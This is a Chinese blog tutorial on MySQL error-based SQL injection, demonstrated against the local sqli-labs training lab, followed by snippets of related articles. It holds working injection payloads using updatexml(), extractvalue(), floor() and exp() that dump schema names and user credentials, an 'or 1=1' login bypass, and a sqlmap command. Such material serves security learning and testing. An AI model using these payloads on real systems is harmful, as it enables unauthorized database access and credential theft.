报错注入常用函数

最新推荐文章于 2025-03-14 21:44:10 发布
最新推荐文章于 2025-03-14 21:44:10 发布
阅读量4.1k 收藏 30
点赞数 4
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43238111/article/details/106205125
版权

常用的三种报错函数

1.原理

在 MYSQL 中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,
在语法发生错误会输出在前端,从而从报错信息中获取设定的信息。
select/insert/update/delete 都可以使用报错来获取信息。

2.步骤

第一步:先判断是否存在漏洞
第二步:构造错误的语法,使用对应的报错函数:
		updatexml(),extractvalue(),floor() ,exp() 
第三步:爆表名
第四步:爆字段
第五步:爆数据名
第六步:报数据值

3.函数

1.updatexml()函数

• updatexml()函数是 MYSQL 对 XML 文档数据进行查询和修改的 XPATH 函数; 
	①Xml:可扩展语言;
	②update():函数更新。
	③组合,具有查询功能的函数,用于查询xpath。

• payload:updatexml(Xml_document,Xpathstring,new_value)
	①xml_document:xml标记
	②Xpathstring:显示输入语句
	③new_value:新值

• 具体用法:updatexml(1,concat(0x7e,(select database()),0x7e),1)

• 案例1:
以sqli-labs的环境的less-1为例
①判断漏洞类型:
http://127.0.0.1/sqli-labs/Less-1/?id=1
http://127.0.0.1/sqli-labs/Less-1/?id=1’
http://127.0.0.1/sqli-labs/Less-1/?id=1’ and 1=1 #
http://127.0.0.1/sqli-labs/Less-1/?id=1’ and 1=2 #
②爆数据库名
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and updatexml(1,concat(0x7e,(database()),0x7e),1) #
③爆数据库表名
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) #
④报字段名
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’),0x7e),1) #
⑤数据值
http://127.0.0.1/sqli-labs/Less-1/?id=1’ and updatexml(1,substring(concat(0x7e,(select group_concat(username,0x3a,password,0x3a) from security.users),0x7e),32,64),1) #

2.extractvalue()函数

• extractvalue()函数也是 MYSQL 对 XML 文档数据进行查询的 XPATH 函数; 
• Payload:extractvalue(xml_document,concat(0x7e,concat(database())))
• 具体用法:extractvalue(1,concat(0x7e,(select database())))

案例2:
以sqli-labs的less-11为准
①爆数据库名:
http://127.0.0.1/sqli-labs/Less-2/?id=-1’ union select 1,(extractvalue(1,concat(0x7e,(select database())))) #
结果:库名security
②爆数据库表名
http://127.0.0.1/sqli-labs/Less-2/?id=-1’ union select 1,(extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)))) #
结果:表名emails,referers,uagents,users
③爆字段名
http://127.0.0.1/sqli-labs/Less-2/?id=-1’union select 1,(extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)))) #
结果字段名id,username,password
④爆数据值
http://127.0.0.1/sqli-labs/Less-2/?id=-1’union select 1,(extractvalue(1,concat(0x7e,(select group_concat(id,0x3a,username,0x3a,password) from security.users)))) #
结果数据值有:1:Dumb:Dumb,2:Angelina:I-kill-y

3.floor()函数

• floor()函数是 MYSQL 中用来取整的函数。
• 具体用法:
(select 1 from (select count(*),concat(version(),
floor(rand(0)*2))x from information_schema.tables group by x)a)#

案列3:
以sqli-labs的环境的less-1为例
①爆数据库名:
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and (select 1 from (select count(*),concat(database(),floor(rand(0)2))x from information_schema.tables group by x)a)–+
②爆数据库表名
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and (select 1 from (select count(),concat((select table_name from information_schema.tables where table_schema=‘security’ limit 3,1),floor(rand(0)2))x from information_schema.tables group by x)a)–+
③爆字段名
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and (select 1 from (select count(),concat((select column_name from information_schema.columns where table_schema=‘security’ and table_name=‘users’ limit 0,1),floor(rand(0)2))x from information_schema.tables group by x)a)–+
④爆数据值
http://127.0.0.1/sqli-labs/Less-1/?id=-1’ and (select 1 from (select count(),concat((select concat(id,username,password) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+

错误点:1.group_concat与substring,limit同时用没有意义,但是也可以一起用
	  2.subtring(string,m,n);其中m是第m个,n是提取长度
	  3.还可以用not in,可以实现对数据库内容的遍历

课外补充

  3.优先级比较
  	=  >  and  >  or

例:万能密码:

将 or ‘1’=’1  ’输入到passwd里,可以直接登录

将 or ‘1’=’1  ’# 输入到用户里,可以直接登录
《网络安全自学教程》- SQL注入报错注入原理+步骤+实战操作
wangyuxiang946的博客
03-07 1万+
这篇文章为大家解析报错注入的实现原理,结合实战案例讲解报错注入的使用步骤。
sql注入-报错注入
爆金币了,老登!
07-09 620
针对于dvwa靶场的sql报错注入
sql注入报错注入
2301_80913334的博客
04-12 3625
掌握好extractvalue、updatexml、floor报错,floor报错较难需要多理解,updatexml较为常用报错注入是通过特殊函数错误使用并使其输出错误结果来获取信息的。是一种页面响应形式。响应过程:用户在前台页面输入检索内容后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行数据库将执行的结果返回后台,后台将数据库执行的结果无加区别的显示在前台页面报错注入存在基础:后台对于输入输出的合理性没有做检查演示:输入正常语句情况下页面。
报错注入7大常用函数
qq_64395221的博客
05-21 1537
GTID_SUBSET( set1 , set2 ) - 若在 set1 中的 GTID,也在 set2 中,返回 true,否则返回 false ( set1 是 set2 的子集) GTID_SUBTRACT( set1 , set2 ) - 返回在 set1 中,不在 set2 中的 GTID 集合 ( set1 与 set2 的差集)GTID_SUBSET() 和 GTID_SUBTRACT() 函数,我们知道他的输入值是 GTIDset ,当输入有误时,就会报错。#获取users表里的段名。
SQL注入-常见的报错注入类型详解
lza20001103的博客
03-14 1049
SQL注入-常见的报错注入类型详解
报错注入七大常用函数
weixin_54217950的博客
02-15 7858
报错注入七大大常用函数 1.ST_LatFromGeoHash()(mysql>=5.7.x) and ST_LatFromGeoHash(concat(0x7e,(),0x7e))--+ 2.ST_LongFromGeoHash(mysql>=5.7.x) 同 8 ,都使用了嵌套查询 and ST_LongFromGeoHash(concat(0x7e,(),0x7e))--+ 3.GTID (MySQL >= 5.6.X - 显错<=200) 0x01 GTID GTID是M
基于函数报错注入·
qq_42764906的博客
03-31 342
首先查看是否有漏洞(注:用英文状态下的’否则出不来 用大写锁定也可以) 输入 得到 我们需要做一些处理 否则只会出现一部分 会被吃掉 加~ ~为 0x7e 分别 得到 得到 输入 得到 用limit 从第一个位置开始取limit 0,1 如果是第二个位置limit1,1 以此类推 输入 得到 输入 输入 得到 输入 得到 输入 得到 汇总 ...
SQL注入报错注入
qq_68163788的博客
01-27 3134
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
SQL注入报错注入函数
cyjmosthandsome的博客
02-26 7015
一、extractvalue() extractvalue(xml_frag,xpath_expr)函数接受两个参数,第一个为XML标记内容,也就是查询的内容,第二个为XPATH路径,也就是查询的路径。如果没有匹配内容,不管出于何种原因,只要xpath_expr有效,并且xml_frag由正确嵌套和关闭的元素组成 - 返回空字符串。不区分空元素的匹配和无匹配。但是如果X...
报错注入常用报错函数总结
qq_43609884的博客
06-13 2035
sql注入
几种常见的报错注入类型详解
m0_74312676的博客
07-23 2058
报错注入是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
报错注入函数指南
qq_28624871的博客
05-01 2428
1. geometrycollection() mysql版本5.5   (1)函数解释: GeometryCollection是由1个或多个任意类几何对象构成的几何对象。GeometryCollection中的所有元素必须具有相同的空间参考系(即相同的坐标系)。   (2)官方文档中举例的用法如下: GEOMETRYCOLLECTION(POINT(10 10), POINT(30 30), LINESTRING(15 15, 20 20))   (3)报错原因: 因为MYSQL无法使用这样的字符串画
基于报错的信息获取 三个常用的用来报错函数
安全界的彭于晏的博客
06-25 408
基于报错的信息获取 技巧思路: 在MYSQL 中使用一些指定的函数来制造报错,从而从报错信息中获取设定的信息. select/insert/update/delete 都可以使用报错来获取信息 背景条件: **前提** 后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端 基于报错的信息获取 三个常用的用来报错函数 **updatexml()**:函数是MYSQL 对XML 文档数据进行查询和修改的XPATH函数 **extractvalue()**:函数也是MYSQ
mysql注入报错函数,mysql报错注入
weixin_32175667的博客
03-18 393
1、报错注入攻击payload语法由于后台没有对数据库的报错信息做过滤,会输入到前台显示,那么我们可以利用制造报错函数(常用的几个函数updatexml(),extractvalue(),floor())进行渗透。报错注入流程:1、判断是否存在注入点2、构造错误的语法制造报错3、使用提示报错信息输出内容。updatexml()函数:xml可扩展标记语言,update()更新函数updatexml(...
sql注入(6)报错注入
c10udz的博客
05-11 5774
mysql 报错注入原理及部分函数讲解
Keepb1ue的博客
05-17 3966
文章目录报错注入原理报错函数:updatexml()extractvalue()floor()MySQL版本报错函数利用(参考) 报错注入原理 报错注入的使用场景一般是在页面无法显示数据库的信息,但是是有报错内容的,我们就可以尝试利用报错手段报错将错误信息与子查询语句查询到的内容带出,当然,并不局限于这种场景,只要是有将mysql错误输出,都可以尝试进行报错注入报错注入形式上一般是做两个嵌套的查询,里面的那个查询被称为子查询,执行顺序也是从子查询开始的,所以我们可以通过子查询查询我们想要的数据,然后在
SQL注入报错注入函数
热门推荐
lightsec
03-15 1万+
前言 报错注入的前提是当语句发生错误时,错误信息被输出到前端。其漏洞原因是由于开发人员在开发程序时使用了print_r (),mysql_error(),mysqli_connect_error()函数将mysql错误信息输出到前端,因此可以通过闭合原先的语句,去执行后面的语句。 常用报错函数 updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数 extractvalue() 是mysql对xml文档数据进行查询的xpa...
sql注入----报错注入
2402_83134109的博客
12-19 348
SQL报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。,目前对于各种不同类型数据库,不同版本数据库报错注入时可能并不能通用,常用可以通用的报错注入的方式有两种,xpath注入和主键重复导致的报错
SQL注入报错函数
最新发布
04-22
<think>好的,我现在需要帮助用户查找关于SQL注入报错函数的使用方法和示例。用户已经提供了一些引用内容,我需要结合这些引用来组织回答。 首先,用户提到了四个引用,其中引用1到4都涉及报错注入的不同方面。引用1解释了报错注入的基本原理,引用2和3提到了使用count()和floor()函数的例子,引用4讨论了updatexml和extractvalue函数的使用。用户的上一次问题涉及时间盲注,现在转向报错注入,可能是在学习不同类型的注入方法。 我需要确保回答结构清晰,分点说明每个报错函数的使用方法,并给出示例。同时,用户需要中文回答,所以要注意用词准确。根据用户提供的引用,报错函数包括floor()+rand()、updatexml、extractvalue等,可能还需要补充其他常见函数如exp()。 接下来,我需要检查每个函数的原理、语法、示例payload,以及注意事项。比如,floor(rand()*2)在group by时导致主键冲突,从而引发报错,这个在引用2和3中提到过。updatexml和extractvalue则是利用XPath语法错误来触发报错,这在引用4中有说明。 还要考虑不同数据库的兼容性,比如MySQL和SQL Server是否有不同的函数。用户提供的示例主要是MySQL,所以重点放在MySQL上。此外,需要提到防御措施,帮助用户了解如何防范这类攻击,比如参数化查询和错误信息处理。 用户可能还想知道如何自动化利用这些函数,比如使用sqlmap工具,但问题主要集中在手动使用方法上。因此,示例需要具体,比如如何获取数据库名、表名、字段名,每一步的payload如何构造。 最后,确保回答中的引用标记正确,例如引用[^1]、[^2]等,但根据用户提供的引用内容,可能需要调整引用编号,但用户示例中的引用是[^1]、[^2]、[^3]、[^4],所以保持原样。 总结回答结构: 1. 报错注入原理 2. 常用函数及示例(floor+rand、updatexml、extractvalue、exp) 3. 防御措施 4. 相关问题 需要确保每个函数都有详细的payload示例和解释,并注明对应的引用来源。同时,检查是否有遗漏的函数或方法,如geometrycollection等,但可能用户提供的引用中没有提到,可以暂时不提,或者简要提及。 现在开始组织内容,确保每个部分清晰,使用代码块和表格来展示示例,保持格式正确。</think>#### SQL注入报错函数使用方法详解 --- ### 一、报错注入核心原理 通过构造**特定SQL语句触发数据库报错**,将查询结果直接嵌入错误信息中返回[^1]。核心条件: 1. 应用程序未过滤错误信息(如开启`mysql_error()`输出) 2. 攻击者可控制输入参数 --- ### 二、常用报错函数及Payload示例 #### 1. `floor(rand()*2)` + `GROUP BY`(主键冲突) - **原理**:利用`GROUP BY`分组时产生的临时表主键冲突报错 - **典型Payload**: ```sql id=1' AND (SELECT COUNT(*), CONCAT((SELECT DATABASE()), 0x7e, FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x)-- ``` - 输出示例:`Duplicate entry 'database_name~1' for key 'group_key'`[^2] - **应用场景**: - 获取数据库名、表名、字段名 - 逐字符提取数据(配合`SUBSTRING`函数) #### 2. `updatexml()`(XPath语法错误) - **函数语法**: ```sql UPDATEXML(XML_document, XPath_string, new_value) ``` - **Payload构造**: ```sql id=1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT USER()), 0x7e), 1)-- ``` - 输出示例:`XPATH syntax error: '~root@localhost~'`[^4] - **限制**: - 单次最大输出长度32字符(需配合`SUBSTRING`分段获取) - 仅适用于MySQL 5.1.5+版本 #### 3. `extractvalue()`(XPath语法错误) - **函数语法**: ```sql EXTRACTVALUE(XML_document, XPath_string) ``` - **Payload示例**: ```sql id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version), 0x7e))-- ``` - 输出示例:`XPATH syntax error: '~5.7.36-log~'`[^4] #### 4. `exp()`(数值溢出报错) - **原理**:通过指数函数触发数值溢出错误 - **Payload示例**: ```sql id=1' AND EXP(~(SELECT * FROM (SELECT USER())a))-- ``` - 输出示例:`DOUBLE value is out of range` --- ### 三、分阶段数据提取示例 #### 1. 获取数据库名 ```sql id=1' AND UPDATEXML(1, CONCAT(0x7e, (SELECT DATABASE()), 0x7e), 1)-- ``` #### 2. 提取表名 ```sql id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))-- ``` #### 3. 读取字段值 ```sql id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT password FROM users LIMIT 0,1), FLOOR(RAND(0)*2)) AS x FROM information_schema.tables GROUP BY x) a)-- ``` --- ### 四、防御措施 1. **禁用错误回显**:生产环境关闭`mysql_error()`输出[^4] 2. **参数化查询**: ```python cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,)) ``` 3. **函数黑名单**:过滤`updatexml`、`extractvalue`等关键词 4. **权限控制**:数据库账户仅授予最小必要权限 --- ### 五、工具辅助 使用`sqlmap`自动化注入(指定报错技术): ```bash sqlmap -u "http://example.com?id=1" --technique=E ``` 参数说明:`--technique=E` 表示使用报错注入技术 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值